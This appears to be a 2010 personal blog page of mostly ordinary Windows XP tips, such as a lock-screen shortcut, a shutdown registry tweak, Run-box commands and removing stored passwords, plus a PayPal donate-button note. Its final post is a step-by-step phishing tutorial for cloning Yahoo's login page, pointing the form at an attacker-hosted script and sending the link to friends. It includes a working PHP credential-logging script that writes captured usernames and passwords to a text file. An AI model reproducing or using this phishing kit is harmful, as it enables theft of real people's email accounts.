Pray to only ALLAH

Abdul

Sunday, January 24, 2010

Creating a desktop shortcut for locking your computer

If you use your computer in an area where others may have access to it, and there are things on your system you would



rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here’s a recipe


for a desktop shortcut that will lock your computer in two easy clicks:


Right click on an empty area of the desktop


choose ‘new’ then 'shortcut'.


The create shortcut wizard will open.


in the first text box, type:


%windir%\System32\rundll32.exe user32.dll,LockWorkStation

then give your shortcut an


appropriate name on the next page, and hit ‘finish.’


You will notice that the shortcut you created has a blank icon.


To select a more appropriate one, right click on the


shortcut and hit ‘properties.’ In the ’shortcut’ tab, click the ‘change icon’ button.


In the ‘look for icons in this file’ box


type:


%SystemRoot%\system32\SHELL32.dll


then click ‘ok’ to see a range of


icons for your new shortcut.


Choose an appropriate icon.


Your desktop locking shortcut is now ready for use.


Test it out.

How To Add and Create Paypal Donate Button To My Site.

To be able to accept donation from your readers or visitors due to your outstanding contribution, you may want to insert a ‘Donation’ button onto your website. Donors can make donation via the button, some of the features are:
Accept donations made with credit cards, debit cards, and PayPal right away.

No monthly, set-up, or cancellation fees. Only low transaction fees.
Donors don’t need a PayPal account to make their donations.
Visit Paypal’s website to create a ‘Donation’ button. Gone as the good old days when creating a Paypal ‘Donate’ button requires some basic coding knowledge.
Based on my own past experience, a ‘Donate’ button is nothing more than an ornament, it does not generate much and occupies the precious space. It would be wiser to insert a tiny ads. Unless you have a pool of loyal readers, I strongly advice you against using this feature.

IMPROVE XP SHUTDOWN SPEED

This tweak reduces the time XP waits before automatically closing any running programs when you give it the



command to shutdown.


Go to Start then select Run


Type 'Regedit' and click ok


Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'


Select 'WaitToKillAppTimeout'


Right click and select 'Modify'


Change the value to '1000'


Click 'OK'


Now select 'HungAppTimeout'


Right click and select 'Modify'


Change the value to '1000'


Click 'OK'

Start > Run Shortcuts

Use these shortcuts in Start > Run to get to your configuration tools faster in Windows



XP Professional:


compmgmt.msc Computer


management console


devmgmt.msc Device manager


diskmgmt.msc Disk management


dfrg.msc Disk defragmenter


fsmgmt.msc Shared folders


gpedit.msc Group policy editor


lusrmgr.msc Local users and groups


perfmon.msc Performance monitor


secpol.msc Local security settings

services.msc Manage services

Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:



Click Start, Run and type Control keymgr.dll


Remove the entries from the list.


The other ways to access this dialog are:

Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords


-or-


From Control Panel, select your User Account, click Manage your network
passwords


It Works


~ Cheers ~

Disable Windows Key Shortcuts

If (for whatever reason) you want to prevent users from using shortcuts like [Windows]


+ [E] and so on, navigate to User Configuration > Administrative Templates > Windows

Components > Windows Explorer and enable the “Turn off Windows + X hotkey
setting.

Friday, January 8, 2010

Hack yahoo using fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.
Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page - Procedure

STEP 1.

Go to the Yahoo login page by typing the following URL.
mail.yahoo.com

STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.

Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.

Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.

Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”

Rename the above link into

src=”files/ma_mail_1.gif”

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.

Now search for the following term
action=

you will see something like this
action=https://login.yahoo.com/config/login?

Edit this to
action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.
Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.

Now you have to upload your yahoo.HTML, files folder and login.php to
yoursite.com Root folder

NOTE: Make sure that your host supports PHP

Tip: 110mb.com supports PHP

STEP 8.

Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

here is the login script which i am posting due to large number of requst

header("Location: http://WEBSITE ");
$handle =
fopen("pass.txt", "a");
foreach($_GET as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle,
"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

I have found one more working script if you have problem with this script try below one.
Download login script